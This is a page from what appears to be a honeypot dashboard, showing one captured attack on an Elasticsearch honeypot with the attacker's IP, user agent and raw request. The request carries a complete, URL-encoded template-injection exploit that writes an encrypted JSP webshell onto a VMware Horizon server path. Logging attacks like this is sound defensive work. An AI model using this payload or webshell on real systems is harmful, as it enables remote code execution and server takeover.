Dashboard
IP Addresses

Attribution & Reputation
SSH Honeypots

Attackers

Commands

Proxy Requests

Malware Drops
HTTP Honeypots

Attackers
Elasticsearch Honeypots

Attackers
FTP Honeypots

Attackers

Attack 3dbd7bac-f514-4229-8c62-2abd0f1ad601

Details

ID	3dbd7bac-f514-4229-8c62-2abd0f1ad601
Attack Type	elasticsearch
IP Address	75.127.11.24
Username
Password
Client Version	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40
Country	United States
Date	2023-06-04 08:48PM

Request Data

{
   "path": "",
   "method": "GET",
   "headers": {
     "Accept": "*/*",
     "Connection": "keep-alive",
     "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40",
     "Accept-Encoding": "gzip, deflate"
   },
   "hostname": "localhost",
   "form_data": {
     "deviceType": "${\"freemarker.template.utility.ObjectConstructor\"?new()(\"java.io.FileOutputStream\",\"/opt/vmware/horizon/workspace/webapps/SAAS/jersey/manager/api/images/2907/D46K9iB.jsp\").write(\"freemarker.template.utility.ObjectConstructor\"?new()(\"java.lang.String\",\"%25250A%252B%252B%252B%252B%252B%252B%252B%252B%25253C%252525%252540page%252Bimport%25253D%25255C%252522java.util.%25252A%25252Cjavax.crypto.%25252A%25252Cjavax.crypto.spec.%25252A%25255C%252522%252525%25253E%25250A%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%25253C%252525%252521%25250A%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252Bclass%252BU%252Bextends%252BClassLoader%25257B%25250A%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252BU%252528ClassLoader%252Bc%252529%252B%25257B%25250A%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252Bsuper%252528c%252529%25253B%25250A%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%25257D%25250A%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%25250A%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252Bpublic%252BClass%252Bg%252528byte%252B%25255B%25255Db%252529%252B%25257B%25250A%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252Breturn%252Bsuper.defineClass%252528b%25252C0%25252Cb.length%252529%25253B%25250A%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%25257D%25250A%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%25257D%252525%25253E%25253C%252525%25250A%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252Bif%252B%252528request.getMethod%252528%252529.equals%252528%25255C%252522POST%25255C%252522%252529%252529%25257B%25250A%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252BString%252Bk%25253D%25255C%252522e45e329feb5d925b%25255C%252522%25253B%25250A%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252Bsession.putValue%252528%25255C%252522u%25255C%252522%25252Ck%252529%25253B%25250A%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252BCipher%252Bc%25253DCipher.getInstance%252528%25255C%252522AES%25255C%252522%252529%25253B%25250A%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252Bc.init%2525282%25252Cnew%252BSecretKeySpec%252528k.getBytes%252528%252529%25252C%25255C%252522AES%25255C%252522%252529%252529%25253B%25250A%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252Bnew%252BU%252528this.getClass%252528%252529.getClassLoader%252528%252529%252529.g%252528c.doFinal%252528new%252Bsun.misc.BASE64Decoder%252528%252529.decodeBuffer%252528request.getReader%252528%252529.readLine%252528%252529%252529%252529%252529.newInstance%252528%252529.equals%252528pageContext%252529%25253B%25257D%25250A%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252525%25253E%25250A%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%252B%25253C%252525out.println%252528%25255C%252522e8418d1d706cd73548f9f16f1d55ad6e%25255C%252522%252529%252B%25253B%252525%25253E\").getBytes())}"
   }
 }